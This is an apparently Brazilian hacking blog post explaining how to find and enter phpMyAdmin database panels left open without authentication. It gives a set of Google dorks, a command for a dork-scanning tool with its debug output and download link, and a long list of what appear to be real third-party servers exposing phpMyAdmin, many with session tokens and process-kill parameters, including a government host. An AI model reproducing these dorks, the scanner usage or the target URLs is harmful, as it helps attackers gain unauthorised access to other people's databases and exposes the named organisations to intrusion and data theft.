Google INURL - Brasil: phpMyadmin

Acessando PHPMyAdmin sem validação

Resumo:

phpMyAdmin é um aplicativo web desenvolvido em PHP para administração do MySQL pela Internet. A partir deste sistema é possível criar e remover bases de dados, criar, remover e alterar tabelas, inserir, remover e editar campos, executar códigos SQL e manipular campos chaves. O phpMyAdmin é muito utilizado por programadores web que muitas vezes necessitam manipular bases de dados. Normalmente, o phpMyAdmin é tratado como uma ferramenta obrigatória em quase todas as hospedagens da web, além de pacotes off-line, como o WAMPServer, XAMPP, EasyPHP e PHP Triad.

DORK's DE ACESSO:
-------------------------------------------------------------------------------------------------------------------------------

inurl:"server_variables.php?token="
inurl:"/index.php?target=server_variables.php"
inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin"
inurl:"server_engines.php?token="
inurl:"server_sql.php?token="
inurl:"server_import.php?token="
inurl:"server_export.php?token="
inurl:"db_structure.php?db="
inurl:"main.php?token=" phpMyAdmin
inurl:"server_collations.php?token="

-------------------------------------------------------------------------------------------------------------------------------

Exemplo de acesso acesso:

As dorks elaboradas foram baseadas nas urls de acesso, para alguns não deve aprecer pois o painel usa um esquema com iframes com os seguintes menus-url's.

<li><a class="tab" href="server_databases.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_db.png" width="16" height="16" alt="Databases" />Databases</a></li>
<li><a class="tab" href="server_sql.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_sql.png" width="16" height="16" alt="SQL" />SQL</a></li>
<li><a class="tab" href="server_status.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_status.png" width="16" height="16" alt="Status" />Status</a></li>
<li><a class="tab" href="server_variables.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_vars.png" width="16" height="16" alt="Variables" />Variables</a></li>
<li><a class="tab" href="server_collations.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_asci.png" width="16" height="16" alt="Charsets" />Charsets</a></li>
<li><a class="tab" href="server_engines.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_engine.png" width="16" height="16" alt="Engines" />Engines</a></li>
<li><a class="tabactive" href="server_processlist.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_process.png" width="16" height="16" alt="Processes" />Processes</a></li> <li><a class="tab" href="server_export.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_export.png" width="16" height="16" alt="Export" />Export</a></li>
<li><a class="tab" href="server_import.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_import.png" width="16" height="16" alt="Import" />Import</a></li> </ul>

OBS: Algums serves não te daram acesso de imediato as tabelas, para isso use o executor de sql.
Usando SCANNER INURL para facilitar a busca.

Exemplo de comando:
php botConsole.php --host='www.google.com.br' --dork='inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla' --arquivo='MYSQL.txt' --tipoerro='2' --exploit='' --achar='phpMyAdmin'

DEBUG:
----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla
0xEXPLOIT............:
0xARQUIVO............: MYSQL.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: phpMyAdmin
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:

Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla
    [arquivo] => MYSQL.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => phpMyAdmin
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla&num=1900&btnG=Search
    [port] => 80
)

[ BAIXAR: http://pastebin.com/TzijC99y ]

REF:
http://pt.wikipedia.org/wiki/PhpMyAdmin
http://www.phpmyadmin.net/

Resultados da pesquisa:

http://mech.sharif.ir/~web/phpmyadmin/server_processlist.php
http://www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
http://www.nautilus.com.br/clientes/phpmyadmin_barcessat/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=f4e23698e63cb037f9ceb9eae1bd66da
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=0717590837c536a6b2fdf71b3e3dfb69&full=1&phpMyAdmin=qSVwBZtc8J68bUpNrdmHohiwvO6
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=629550b445dd53557edc873fea8256a7&full=1&phpMyAdmin=upcVaWZRbIqzaA7ZIn2NC7tcVXa
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7850d21f77f5ff41c6a30d1468df949e&full=1&phpMyAdmin=5IeY%2C8tUFuMK6QBK-QvQoDVhkI0
http://contemar.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=25a89618f06d460b726bb902f261dc48
http://contemar.com/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=c0c6689d5bfd46016dfce6ad2e7dfc49
http://kalifaalmisnad.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d8f0843a76df17a88f489880a8a0fe86
http://webservice.jmasjuarez.gob.mx:8888/phpmyadmin/server_processlist.php?token=3b348ec6ff1b099c465f8ca203656538&full=1
https://www.der-insolvenzberater.de/phpMyAdmin/server_processlist.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&kill=209505387
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=01395f779fcfe1160c96f9eb839860af&kill=15710
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3d4354e7a691623453b29361ea95be24&kill=17812
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61a9ec4af824fbf24b368f29ba2f36d3&kill=116759
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ce58de690a926679d6b10589bb1b25a1&kill=15076
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ae7332a9388dd4763b0f9195b67ce197&kill=148286
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1d847c6be291d8428d8c828af4fde151&kill=113261
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=be9a026238ab69f456c53337318599a3&kill=22662
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=161b1d193b0032814d65f117af4074cb&kill=12862
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3ba1c5db1b7c429310ca466d8a3a4f9a&kill=108535
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1de9baadfb04138dcc81eb84d4b45421&kill=11170
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1bd8be911d5ea86940f12a7e7bd314c7&kill=15121
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6b7d94bc8ead69989a5029f85594ac28&kill=11628
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=615dee42fa4bb4f27dadb0fc5443a126&kill=14768
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=79d1803b895548651c481a7358109955&kill=171800
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=dde1ce380bf8aef5e540b98d03c71f82&kill=49081
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5e5761963c4f8e162ef84d9c1314426b&kill=28424
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=fe769b489d3faa1af424d7f494a2fd7b&kill=5552
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=81809c221f69540df71746d8a4974216&kill=115784
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7bd07acd4c06d737d445184c2daa9934&kill=154635
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3023cf534d907c3096a907c26f2b31df&kill=17227
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=28b024572f0f02fa5540619532cc448c&kill=12683
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61415fd5a6703bff296bd9a95b186a9c&kill=30052
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=87ad999dfd8e1e831ee4d8a7a4fdc6be&kill=4724
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=a5c70b6418a08d53b441f85aba7ab469&kill=16152
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=08c87f19ccbea81587423b4c7658a17e&kill=14637
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b17527ee7093814acd79faef0ca0642a&kill=17173
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=15c68c757f728a341a8e670a6dec1f74&kill=12618
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d4b87d5771681e2677becd9cfa8cc42b&kill=730
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d52749f3c3fa8de4f3cb4c692ee27bc1&kill=15447
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9c4973ed00c81fea82949e86074767da&kill=10851
http://royaltouchny.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b64ac0249e08905103b6c694b46d209b
http://www.elektro-denker.com/phpMyAdmin-elebwbvm/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6788654e634886ee9ca4ca18818a7f99&full=1
www.elektro-denker.com
www.elektro-denker.com/
http://202.137.230.154/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=04f7d18dd41feabf6f193ce98845d0e7
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=ef4ce41cc7bb19fa4216a8d1fd89b2a5&kill=84848
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=28e762b909008475fa0df0b505d9594d&kill=90009
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=d54040fd24f287358e5c83e51d41005a&kill=82080
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=dbff09ac97b69ce0b6647a1aed5b9424&kill=82182
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=03aa0d1eb55f9506a963c6b3f7222362&kill=88181
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=b83e7763a2d3035eadf0a3f6c5c20827&kill=80865
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=16599770
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=3127566
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=2344240
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=17134474
http://118.97.147.162/phpmyadmin/server_processlist.php?token=914db90734e2ffdf1ae593444fac693a
http://www.rocketys.net/server_processlist.php?token=6fe896b38b75bc846cefc533fa18b8b9
www.rocketys.net
www.rocketys.net/
http://made-in-dk.eu/phpMyAdmin-knoktfdu4/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5a55615d2a73c3ee8e79741f1c27c637&kill=35563628
http://maxxyz.de/server_processlist.php?token=a863cfb68b631c080e3e289b75dfee9c
http://www.self.org.uk/server_processlist.php?token=5bfb8e5316455b364516652ae3fd34cb
www.self.org.uk
www.self.org.uk/
http://itarget.fr/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1a8151db903b7e9cf2a0ee3ea2815bd4
http://xellnaga.free.fr/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61023193d1a9303ab9c0a9fa397ef1cd
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=2711119
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=80890
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=500730
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=3333&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=14037&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91

Páginas

Parceiro: Camisetas Hacker

quinta-feira, 29 de maio de 2014

Acessando banco de dados PHPMyAdmin sem validação

segunda-feira, 2 de dezembro de 2013

Dork obter acesso ao painel phpMyadmin.